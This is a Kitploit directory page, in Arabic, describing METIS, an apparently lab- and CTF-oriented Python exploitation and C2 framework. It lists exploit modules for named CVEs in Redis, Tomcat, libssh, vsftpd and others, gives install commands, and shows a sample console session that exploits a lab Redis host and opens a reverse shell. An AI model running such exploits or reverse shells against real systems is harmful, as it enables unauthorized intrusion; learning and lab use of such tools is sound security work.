Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
METIS — إطار استغلال Python معياري مع وحدة تحكم بنمط Metasploit، ووحدات Exploit وAuxiliary ذاتية التسجيل، وفحوصات ثلاثية الحالات، ووسائل نقل جلسات متعددة لأهداف المختبر وCTF. | Kitploit
أدوات/GitHubGitHub/k3ystr0k3r/metis
أطر اختبار الاختراقماسحات الثغرات الأمنيةأطر الاستغلالالاستغلالما بعد الاستغلالCTFاختبار الاختراقالقيادة والسيطرةالتعلم والتعليمالفريق الأحمرأداة الوصول عن بعدتطوير الحمولات
36منذ 18س 1دلم تتم المراجعة بعد
GitHubk3ystr0k3r/metis

METIS

إطار استغلال Python معياري مع وحدة تحكم بنمط Metasploit، ووحدات Exploit وAuxiliary ذاتية التسجيل، وفحوصات ثلاثية الحالات، ووسائل نقل جلسات متعددة لأهداف المختبر وCTF.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

METIS - إطار الاستغلال والاستخبارات التهديدية المعياري

███╗   ███╗███████╗████████╗██╗███████╗
████╗ ████║██╔════╝╚══██╔══╝██║██╔════╝
██╔████╔██║█████╗     ██║   ██║███████╗
██║╚██╔╝██║██╔══╝     ██║   ██║╚════██║
██║ ╚═╝ ██║███████╗   ██║   ██║███████║
╚═╝     ╚═╝╚══════╝   ╚═╝   ╚═╝╚══════╝

إطار استغلال بلغة Python مبني لأغراض التعلم. بنية معيارية، وطرفية ذات سمات، وناقلات جلسات متعددة، ومكتبة متنامية من وحدات CVE.


مدفوع من المجتمع

METIS هو إطار بحث أمني مدفوع من المجتمع. الهدف هو بناء مجموعة متنامية من الوحدات التي يساهم بها الباحثون الأمنيون والمطورون والمجتمع الأوسع.

هل لديك ماسح ضوئي مفيد، أو وحدة مساعدة، أو وحدة استغلال، أو أدوات بحث أمني أخرى ترغب في مشاركتها؟ أضفها إلى METIS وافتح طلب سحب (Pull Request).

جميع المساهمات مرحب بها، بشرط أن تتبع بنية الوحدات الخاصة بالمشروع، ومعايير الترميز، وإرشادات الاستخدام المصرح به.

سواء كنت تضيف وحدة CVE جديدة، أو تحسّن وحدة موجودة، أو تصلح خطأً، أو تبني وظائف إطار جديدة، فإن مساهماتك يمكن أن تساعد في جعل METIS أفضل للجميع.

راجع كتابة الوحدات أدناه للحصول على معلومات حول إنشاء وحدتك الخاصة.


ما هو

METIS هو إطار C2/استغلال معياري مكتوب بلغة Python. يشغّل طرفية تفاعلية بأسلوب Metasploit حيث تختار الوحدات، وتضبط الخيارات، وتشغّل الفحوصات، وتحصل على جلسات ضد أهداف المختبر.

إنه مصمم من أجل:

  • التعلم كيف تعمل أطر الاستغلال من الداخل
  • العمل المخبري ضد الأجهزة الافتراضية والحاويات المعرضة للثغرات
  • تدريب CTF حيث يكون الإطار القابل للبرمجة أسرع من الأدوات اليدوية
  • مساهمات المجتمع من خلال وحدات مخصصة وتحسينات الإطار

إنه ليس مصممًا من أجل:

  • مهاجمة الأنظمة التي لا تملكها أو ليس لديك إذن كتابي باختبارها
  • مهام الفريق الأحمر الإنتاجية (استخدم Cobalt Strike أو Sliver أو Mythic)
  • أي شيء على الإنترنت العام

الميزات

  • بنية معيارية — أسقط ملف .py في modules/ وسيتم تسجيله تلقائيًا
  • نوعان من الوحدات — Exploit (ينشئ جلسات) و Auxiliary (ماسحات ضوئية، عدّادات)
  • check() ثلاثي الحالات — يمكن لكل وحدة التحقق قبل الهجوم (VULNERABLE / SAFE / UNKNOWN)
  • ناقلات جلسات متعددة — مآخذ عكسية، مآخذ ربط، قنوات paramiko، webshells HTTP، telnet خام
  • مسح ضوئي متعدد الخيوط — مواصفات أهداف CIDR/قائمة مفصولة بفواصل/نطاق/file: مع أشرطة تقدم مباشرة
  • طرفية ذات سمات — 22 نظام ألوان مدمج مع تدرجات أشرطة تقدم لكل سمة
  • أتمتة ملفات RC — برمجة سير العمل بالكامل
  • ملفات SOURCE لكل وحدة — تحميل الخيارات من ملفات KEY=VALUE
  • الهروب إلى الصدفة المحلية — تشغيل أي أمر shell دون مغادرة الإطار
  • نواة خفيفة — تبعيات وتجريدات قليلة عمدًا

الوحدات

Auxiliary — الماسحات الضوئية والعدّادات

الوحدةالوصف
auxiliary/scanner/tcp_connectماسح ضوئي لمنافذ TCP متعدد الخيوط
auxiliary/scanner/hikvision_cve_2017_7921تجاوز مصادقة كاميرا Hikvision IP + تعداد المستخدمين
auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847تسريب بيانات اعتماد MikroTik WinBox
auxiliary/scanner/redis_cve_2022_0543كاشف الهروب من صندوق رمل Lua في Redis

Exploits — المنتجة للجلسات

الوحدةنوع الجلسة
exploit/unix/ftp/vsftpd_234_backdoorمأخذ ربط
exploit/multi/http/ghost_cms_handlebars_rceمأخذ عكسي
exploit/multi/http/langflow_rce_cve_2026_9198مأخذ عكسي
exploit/multi/http/budibase_plugin_upload_rce_cve_2026_31816مأخذ عكسي
exploit/multi/http/activemq_jolokia_rce_cve_2026_34197مأخذ عكسي
exploit/multi/http/tomcat_put_rce_cve_2017_12615مأخذ عكسي
exploit/multi/http/joomla_jce_rce_cve_2026_48907webshell HTTP
exploit/linux/http/freepbx_sqli_rce_cve_2025_57819عكسي متأخر (cron)
exploit/linux/redis/redis_cve_2022_0543_rceمأخذ عكسي
exploit/linux/ssh/libssh_auth_bypass_cve_2018_10933قناة Paramiko
exploit/linux/telnet/inetutils_telnetd_bypass_cve_2026_24061مأخذ telnet خام

التثبيت

يتطلب Python 3.10+ و git.

git clone https://github.com/K3ysTr0K3R/METIS.git
cd METIS

python3 -m venv .venv
source .venv/bin/activate

pip install -r requirements.txt

requirements.txt:

pwntools>=4.11.0
requests>=2.31.0
paramiko>=3.0.0
redis>=5.0.0
cryptography>=42.0.0
rich>=13.7.0
prompt_toolkit>=3.0.43

التشغيل:

python3 metis.py

الاستخدام

metis > show modules

  #    Module                                                        Date        Rank       Chk  Description
  --   ------------------------------------------------------------  ----------  ---------  ---  -----------
  1    auxiliary/scanner/hikvision_cve_2017_7921                     2017-09-23  normal     Yes  Hikvision IP Camera Authentication Bypass (CVE-2017-7921)
  2    auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847        2018-08-01  great      Yes  MikroTik WinBox Credential Leak (CVE-2018-14847)
  ...
  15   exploit/unix/ftp/vsftpd_234_backdoor                          2011-07-03  excellent  Yes  vsftpd 2.3.4 Backdoor Command Execution

metis > search redis

  #   Module                                       Date        Rank       Chk  Description
  --  ------                                       ----       ----       ---  -----------
  1   auxiliary/scanner/redis_cve_2022_0543        2022-02-18  excellent  Yes  Redis CVE-2022-0543 Scanner
  2   exploit/linux/redis/redis_cve_2022_0543_rce  2022-02-18  excellent  Yes  Redis CVE-2022-0543 Lua Sandbox Escape RCE

metis > use 2
[*] using exploit/linux/redis/redis_cve_2022_0543_rce
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set RHOST 192.168.56.101
[+] RHOST => 192.168.56.101
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set LHOST 192.168.56.1
[+] LHOST => 192.168.56.1
metis exploit(linux/redis/redis_cve_2022_0543_rce) > check
[*] check: probing 192.168.56.101:6379
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[*] check -> vulnerable
metis exploit(linux/redis/redis_cve_2022_0543_rce) > exploit
[*] running check() before exploit (AUTOCHECK=true)
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[+] target appears vulnerable — proceeding
[*] listening on 192.168.56.1:4444 for reverse shell
[+] shell from 192.168.56.101:51234
[+] new session: <Session a3f2b1c4 192.168.56.101:51234>

metis exploit(linux/redis/redis_cve_2022_0543_rce) > sessions
  a3f2b1c4  192.168.56.101:51234  (alive)

metis exploit(linux/redis/redis_cve_2022_0543_rce) > interact a3f2b1c4
[*] interacting with a3f2b1c4. 'background' returns, '!cmd' runs locally.
a3f2b1c4 $ id
uid=105(redis) gid=108(redis) groups=108(redis)
a3f2b1c4 $ background
metis >

الأوامر الشائعة

تنزيل الأداة